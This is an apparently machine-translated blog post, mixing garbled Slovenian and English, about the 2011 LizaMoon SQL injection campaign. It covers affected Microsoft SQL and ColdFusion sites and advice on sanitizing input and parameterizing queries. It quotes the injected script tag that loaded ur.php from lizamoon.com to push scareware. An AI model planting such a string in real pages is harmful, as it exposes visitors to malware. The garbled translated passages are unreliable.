Velika Lizamoon SQL Injection Attack – Marec-april 2011



No – Petek stvari se je začela zanimiva za tehnologijo straneh novice. Večina strani so delovali lažnih bedaki maj zgodbe in nekaj tudi Websense je tekoče z velikim napadom dogaja pred mnogimi SQL, ki temeljijo na spletnih straneh. Podrobnosti so razdrobljeni – Ljudje so povedali, da si za ur.php datotek na njihovi spletni imenik (kar ni ravno dober test, da vidim, če je vaša stran okuženih s to SQL injection…) “<script src = http://lizamoon.com / ur.php”> je primer kode, ki se vstavi v podatkovnih baz SQL in kaj pravzaprav počne, je obiskovalce silijo, da obiščejo scareware mesto, kjer se malware lahko nameščen na svojem računalniku, ki trdi, da imajo virus…. (koliko od tistih, ki smo jih videli v zadnji 5-10 let?)

Eden od mojih sitnost s tech novice (zlasti virus novice) Pokritost je, da ko zgodba postane dovolj velika, da se pokrivajo z velikimi mediji, nikoli ji dela krivico. Želim informacije. Kaj je to napad? Kateri programi so ranljivi, Ali obstaja vzorec?


This is one of the things that annoyed me about the coverage of this particular beastie…. okay fine it’s an sql injectionis it mysql? ms-sql? some other blend? Is it attacking WordPress or drupal or movable type or what? Not much detail was to be found. There were outrageous claims of 4 million sites infected (which is wildly inflated.) The best estimate I’ve seen is in the 200,000+ Območje. Google searches showed millions of pages with the suspect text although that included multiple pages per site and many sites that were simply reporting on the exploit.

So…. Saturday I was asked about it and I hadn’t been able to do much research. So, I did a bit of research and found that it seems most every site affected that had been identified by Websense was a Microsoft SQL backend. At that point I breath a bit easier in the fact that I won’t be urgently upgrading 50 or so MySQL based blog enginesIn fact after reading a bit further I essentially filed it for the weekend as I have nothing deployed that depends on MS-SQL.

Tako, today I was thinking that there must be some pattern as to what is vulnerable…. Looking at the google iskanje that shows the infected blurb of code….

I see .cfm pages, .asp pages, .aspx pages, I found a site with this powered by:

Mango BlogA ColdFusion blog engine

I see several other sites that seem to be database driven but it’s unclear what site design engine I’m lookiing out. Really the common denominator is asp/cold fusion and microsofts framework for web applications.

The best advice that is given is that you should always filter/sanitize input into databases. In other words don’t trust your site visitors to put in good things in forms. Trust them to try and break through to the database underneath by using characters that are going to give a hint to your database that it’s time to do a command instead of treating the input as text.

There is a good asp.net article on Preventing SQL injection.

It really is reminiscent of this great cartoon…. about little Bobby Tables….

Da je veliko povedal…. it seems that better advise is to paramaterize your SQL calls….

Good tutorial site on avoiding sql injection problems

I suspect there are many hundreds of site owners that still aren’t aware that they were compromised.

So here’s the flamebaitare poor SQL coding practices a common trait in the Microsoft toolkit environment?

I doubt it’s just a MS toolkit issuealthough the proliferation ofeasily make your own database driven sitetoolkit would seem to encourage sloppy design. (Da – Vem… open source based blog engines have had their share of sql injection issues too….)

Making it easy for anyone to make a database driven website does not mean everyone will follow best practices for validating input. (In fact in most things that I’ve seenmaking things easier seems to encourage cutting corners…)

Podobni Posts

Blog Traffic Exchange Podobni Posts
  • Real VNC 4.1.1 ranljivost - Oddaljeni dostop brez gesla To je ena treba preveriti, kdo uporablja VNC za daljinsko upravljanje. Izgleda, kot da je intelliadmin naleteli na ranljivost v Real VNC 4 (objava slashdot Videl sem predlagal, "vsak stroj teče VNC 4.1") Nisem še preizkušen, tako da ne vem, če to vpliva samo na RealVNC'S ......
  • Pozor: Volkovi v oblačila ovac na voljo na različnih lokacijah (varnostni prevare) To je še en "volk ​​v oblačila ovac" opozorilo. Blog Sunbelt ima informacije in nasvete o številnih drugih spletnih strani, ki nastopajo kot bodisi Windows Security Center stran, ali strani ni mogoče najti napake. Varnostno središče programa Windows prevara enkrat trdi naslednje: "Pozornost! Vaš sistem ......
  • Macromedia Flash Player ranljivost Huda varnostna ranljivost, je na voljo v različicah Flash Player pred 7.0.19.0 Veliko spletnih strani zahtevajo flash player, da si ogledate različne funkcije na spletni strani (glede na to spletno stran sega od reklam na mestu navigacijo.) Posebej oblikovana swf na daljavo ......
Blog Traffic Exchange Sorodne spletne strani
  • Tako, You Dont Have Any Ideas HOW TO GET 1,000’S OF FREE VISITORS AND FREE PUBLICITY TO YOUR SITE.By: Georgie McGrew Internet for Women OnlyRecent research about internet marketing strategies shows that one of the most commonly used tools for increasing website traffic and publicity is the blog or "web log". The reason that people are......
  • 6 Sites For Selling Private Ads On Your Blog Don't know where to sell private Ads for your blog ? That's a great idea that you have taken today. Da, its one of the major source of income for many successful bloggers. Apart from regular Adsense and Affiliate income, selling private ads is concrete method to increase your blogging......
  • Je Prva stran H1 SEO strategije učinkovito za uporabnike interneta in virtualnih asistentov? Razlaga virtualnih pomočnikov na način pisave, da je velikost H1 je lahko del odlične tehnike SEO, saj pajki pogled na ključne besede v tej pisavi, da so bolj pomembne. Resnična moč vožnjo več prometa na vašo spletno stran, je v ......
PDF24    Pošlji članek po PDF   

Podobne objave


Poglejte, kaj se je zgodilo na ta dan v zgodovini bodisi iz BBC Wikipedia
Iskanje:
Ključne besede:
Amazon Logo

Komentarji so zaprti.


Preklopi na našo mobilno spletno stran